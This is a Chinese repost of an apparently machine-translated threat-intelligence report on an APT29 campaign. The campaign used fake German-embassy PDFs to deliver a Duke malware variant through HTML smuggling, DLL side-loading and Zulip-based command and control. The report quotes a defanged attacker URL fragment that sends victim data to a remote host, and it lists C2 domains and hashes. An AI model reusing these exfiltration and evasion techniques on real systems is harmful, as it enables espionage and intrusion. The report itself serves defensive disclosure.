执行摘要
EclecticIQ 分析师充满信心地评估,观察到的两份 PDF 文档是针对北约联盟国家外交部的持续活动的一部分。这些 PDF 文件伪装成来自德国大使馆,并包含两个外交邀请诱惑。
其中一个 PDF 提供了 Duke 的变种,这是一种与俄罗斯国家资助的 APT29 网络间谍活动相关的恶意软件。另一个文件很可能用于测试或侦察,因为它不包含有效负载,但如果受害者打开电子邮件附件,则会通知攻击者。
受害者学、诱饵文件、恶意软件传播和恶意软件本身与将该活动与 APT29 联系起来的报告相似,APT29 是俄罗斯对外情报局 (SVR) 的高级持续威胁攻击者。
威胁行为者使用 Zulip(一款开源聊天应用程序)进行命令和控制,以逃避并将其活动隐藏在合法的网络流量后面。
用于传递 HTML 走私的恶意 PDF 文档
EclecticIQ 分析师发现了两份恶意 PDF 文档,这些文档伪装成来自德国大使馆,并通过邀请诱饵针对外交实体。这些文件使用了以下主题:“告别德国大使”和“德国统一日”。第一个 PDF 包含嵌入式 JavaScript 代码,以 HTML 文件格式提供多阶段有效负载。Adobe Acrobat 等 PDF 阅读器有一个默认设置,会在执行 PDF 文档内的代码之前发出警告。用户执行后,PDF 文档会显示“打开文件”警告框(图 1)。如果受害者打开它,代码将启动名为Invitation_Farewell_DE_EMB的恶意 HTML 文件。
图 1 - 打开文件警报框
图 2 显示了德国大使馆的邀请诱饵。PDF 文件内的 mailto 地址引用合法域 bahamas.gov.bs。分析师在 Lab52 7 月中旬的一份报告中观察到了相同的领域。Lab52 最初报告了一场冒充挪威大使馆并通过邀请诱饵针对外交实体的活动。
分析人士高度确信,由于受害者学和所使用的网络钓鱼主题的重叠,冒充德国大使馆的 PDF 文件很可能是由同一威胁参与者创建的。
图 2 - 德国大使馆的邀请诱惑
图 3 显示了德国大使馆邀请函 PDF 中嵌入的 JavaScript 代码,该代码由 PyPDF2 生成。
图 3 - 嵌入 Invitation_Farewell_DE_EMB.HTML
Invitation_Farewell_DE_EMB 是一个 HTML 文件。通过 HTML 走私,威胁行为者传递了一个包含恶意 HTML 应用程序 (HTA) 的 ZIP 文件。HTA 文件是一种广泛使用的 Living Off The Land 二进制文件 (LOLBIN),其中包含 HTML 和脚本代码,用于创建由 Windows HTA 引擎 mshta.exe 执行的独立恶意应用程序 。压缩的 HTA 文件最终会提供 Duke 恶意软件变体(图 4)。
图 4 - Duke 恶意软件变种的交付阶段
图 5 显示了Invitation_Farewell_DE_EMB.html内的 JavaScript 代码。URL sgrhf[.]org[.]pk/wp-content/idx[.]php?n=ks&q='+btoa(p) 由威胁参与者控制,以使用 window.location 接收执行文件路径。路径名,提供受害设备的用户名,并通知威胁行为者可能会成功进行攻击。
图 5 -执行 PDF 诱饵文档后的 HTML 走私
滥用 DLL 旁加载来执行 Duke 变种恶意软件
执行后,HTA 文件会将三个可执行文件放入 C:WindowsTasks 目录中以进行 DLL 旁加载:• AppVIsvSubsystems64.dll - 加载到 msoev.exe 中的库,以执行执行而不会出现任何失败。• Mso.dll - Duke 恶意软件变种通过 DLL 侧载加载到 msoev.exe。• Msoev.exe - 合法签名的Windows 二进制文件,在执行时自动加载Mso.dll 和AppVIsvSubsystems64.dll。
图 6 – 尝试将 DLL 侧载到 Msoev.exe
Windows API哈希用于隐藏导入地址表
EclecticIQ 分析师检查了已删除的 Duke 恶意软件变种 (mso.dll)。分析表明,该恶意软件使用Windows API哈希来隐藏Windows API函数调用的名称。攻击者使用此技术来规避静态恶意软件扫描程序。
图 7 显示了通过 ROR13 哈希算法解码的 Windows 库:
• Kernel32.dll:6A4ABC5B
• Ntdll.dll:3CFA685D
• User32.dll:63C84283
图 7 -反汇编的 Duke 恶意软件变体中的 ROR13 哈希算法
用于隐藏字符串值的 XOR 加密
分析师观察到,所有字符串值均由通用 XOR 加密例程加密,并在执行时解密。图 8 显示了 mso.dll 内解密函数的示例,该函数用于打开诱饵 Invitation.pdf。该恶意软件使用 ShellExecuteA Windows API 打开 PDF 诱饵文档。Invitation.pdf 等字符串数据作为 XOR 加密堆栈字符串静态存储在恶意软件内。
图 8 –反汇编的 Duke 恶意软件变体中的 XOR 解密函数
图 9 显示了 XOR 解密例程。该函数对字节数组执行一次性异或解密,并使用加密数组的最后一个字节作为解密它的密钥。
图 9 -反汇编的 Duke 恶意软件变体中的 XOR 解密例程
图 10 显示了使用十六进制值密钥“F”对 XOR 加密堆栈字符串进行手动解密:
图 10 – 手动解密的堆栈字符串
Zulip:在合法网络流量中隐藏 C2 通信
EclecticIQ 分析师观察到,威胁行为者使用 Zulip 服务器建立 C2 连接,并与合法的 Web 流量混合。Zulip 是一个开源聊天应用程序,它使用 Amazon Web 服务接收和发送聊天消息。攻击者使用 Zulip 的 API 功能将受害者详细信息发送到攻击者控制的聊天室 ( toyy[.]zulipchat[.]com ),并发出恶意远程命令。
图 11 - 来自 toyy[.]zulipchat[.]com 的 C2 通信
所有 API 请求标头(例如 URL、授权令牌和请求本身)都加密存储在 Duke 恶意软件变体中。解密后的内容见下面的附录A。
旋转 PDF 文档向威胁行为者通知成功率
根据先前确定的 URL 中的参数 - sgrhf[.]org[.]pk/wp-content/idx[.]php?n=ks&q='+btoa(p) -分析人员确定了第二个 PDF 文件。PDF(图 12)使用了“德国统一日”作为诱饵。分析师以中等信心评估,该 PDF 文档很可能被威胁行为者用于侦察或测试目的。它不包含有效负载,但如果受害者通过受感染的域edenparkweddings[.]com接收通知来打开电子邮件附件,则会通知攻击者。
图 12 - “德国统一日”接待诱饵
归因
EclecticIQ分析师高度确信,所识别的 pdf 文档是针对全球外交使团的更广泛活动的一部分。受害者学、网络钓鱼诱饵的主题、恶意软件传播和恶意软件本身与 OSINT 报告相似,该报告将该活动归因于 APT29。
图 13 – 此活动的钻石模型
APT29 也称为 CozyBear、The Dukes、Cloaked Ursa、Nobelium、UNC2452 是自 2008 年以来活跃的高级持续威胁行为者 (APT)。美国和英国政府将 APT29 归属于俄罗斯对外情报局 (SVR),该局负责收集数据来自外国的政治和经济情报。
Duke 恶意软件变体首先由 F-Secure 描述,EclecticIQ 分析师在最近的样本中发现了代码相似之处。
众所周知,APT29 会滥用 Microsoft OneDrive 和 Notion API 等合法 Web 服务,以逃避的方式执行命令和控制通信 (C2)。在这次新的活动中,威胁行为者使用 Zulip Web 服务作为 C2。
APT29 的主要目标是美国和欧洲的政府和政府分包商、政治组织、研究公司以及能源、医疗保健、教育、金融和技术等关键行业。
保护和缓解策略
- 配置入侵检测系统 (IDS) 和入侵防御系统 (IPS) 或任何网络防御机制,以警报和阻止通过意外 Web 服务的可疑网络流量。
- 使用附录 B 中提供的 YARA 规则搜索 Windows 端点是否存在潜在的 Duke 恶意软件变体感染。
- 在 Windows 主机上实施应用程序允许列表策略,以防止可能执行 msoev.exe 等 LOLBIN。
妥协指标 (IoC)
PDF 诱饵:
Fc53c75289309ffb7f65a3513e7519eb
50f57a4a4bf2c4b504954a36d48c99e7C2 服务器:
toyy[.]zulipchat[.]com
sgrhf[.]org[.]pk
edenparkweddings[.]comDuke 恶意软件变种:
0be11b4f34ede748892ea49e473d82db
5e1389b494edc86e17ff1783ed6b9d37
d817f36361f7ac80aba95f98fe5d337d转载来源:https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs
图片来源网络侵权可联系删除
